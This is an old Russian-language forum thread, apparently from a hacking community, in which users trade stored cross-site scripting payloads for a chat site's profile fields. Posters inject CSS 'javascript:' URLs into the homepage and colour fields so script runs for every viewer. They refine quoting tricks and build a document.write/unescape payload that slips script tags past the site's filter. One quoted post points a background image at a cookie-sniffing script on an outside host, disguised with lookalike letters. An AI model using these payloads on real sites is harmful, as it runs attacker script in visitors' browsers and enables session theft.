</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (subscribe1 @ июня 04 2002,17:11)</td></tr><tr><td id="QUOTE">1) Насчет VB -спасибо. Буду работать... :)
2) &quot;Но зато точно работает дыра в URL странички&quot;, не подскажешь что это такое (или ссылка на статью).
Спасибо[/QUOTE]<span id='postcolor'>
В информации пользователя можно указывать адрес домашней странички.
Вместо него пишешь например
&quot; style=`background-image:url('javascript:alert()');visibility:hidden`
Этот скрипт сработает у всякого, кто посмотрит твою инфу...

Восторженные аплодисменты, Algolу от меня! Восхищен. И еще раз заверяю всех, что будут наказаны только обидчики. Это мой принцип.
Дима
Спасибо

Намсет JavaScript - самое смешное что у меня работает. И довольно хорошо.
Теперь буду разбираться как можно выкинуть обидчиков из чата...

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">&quot; style=`background-image:url('javascript:alert()&#39;visibility:hidden`[/QUOTE]<span id='postcolor'>

<span id='ME'><center>mifan думает что нада писать в конце не <span style='color:red'>'</span> а <span style='color:red'>&quot;</span></center></span>

и так подведем итоги:

Если в информации пользователя вместо урл странички указать
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"> " style=`background-image:url('javascript:alert()');visibility:hidden" [/QUOTE]<span id='postcolor'>
То этот скрипт сработает у всякого кто просмотрит вашу инфу.
=======================================
Так что еще, может кто нибуть нашел еще уязвимости?

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">mifan думает что нада писать в конце не <span style='color:red;backgrоund-image:иrl(&quot;//antichat.ru/cgi-bin/sniff.pl&quot'>&quot;</span> а <span style='color:red;backgrоund-image:иrl(mailto:вот как бывает ...)'>&quot;</span>[/QUOTE]<span id='postcolor'>
Algol думает что в конце нужно писать именно `

&quot;все прошло&quot;... Егорыч+++
Ага , как бы не так )) .... Algol

My Webpage

Предыдущее общение можно стереть (я дурак)...

Вопросик, хочу написать скарипт посложнее...
Вот такой вот работает (через цвет):
цвет=&quot;background-image:url(javascript:document.write(unescape('%3C' )+'script'+unescape('%3E')+'alert()'+';'+'alert()' +unescape('%3C')+'/script'+unescape('%3E') ))&quot;&quot;

В чате он превращается в
color:;background-image:url(javascript:document.write(unescape(&amp; #39;%3C&amp;#39;)+&amp;#39;script&amp;#39;+unescap e(&amp;#39;%3E&amp;#39;)+&amp;#39;alert()&amp;#39; +&amp;#39;;&amp;#39;+&amp;#39;alert()&amp;#39;+une scape(&amp;#39;%3C&amp;#39;)+&amp;#39;/script&amp;#39;+unescape(&amp;#39;%3E&amp;#39;) ));

Но все равно работает. Но вот когда я забиваю внутрь alert
что нибудь типа alert ('kkk') то он преврfщается в неисполнимый (т.е. ' чат внутри алерта меняет на &amp;#39) и скрипт не испольняется. Как быть не подскажите?

Уже решил... можете не отвечать: &nbsp;alert(&amp;quot;dd&amp;quot;)

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Algol @ июня 05 2002,12:11)</td></tr><tr><td id="QUOTE"></span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">mifan думает что нада писать в конце не <span style='color:red;backgrоund-image:иrl(&quot;//antichat.ru/cgi-bin/sniff.pl&quot'>&quot;</span> а <span style='color:red;backgrоund-image:иrl(mailto:вот как бывает ...)'>&quot;</span>[/QUOTE]<span id='postcolor'>
Algol думает что в конце нужно писать именно `

&quot;все прошло&quot;... Егорыч+++
Ага , как бы не так )) .... Algol[/QUOTE]<span id='postcolor'>
странно а пачиму у меня не пашет с ', а только с &quot;, может руки кривые?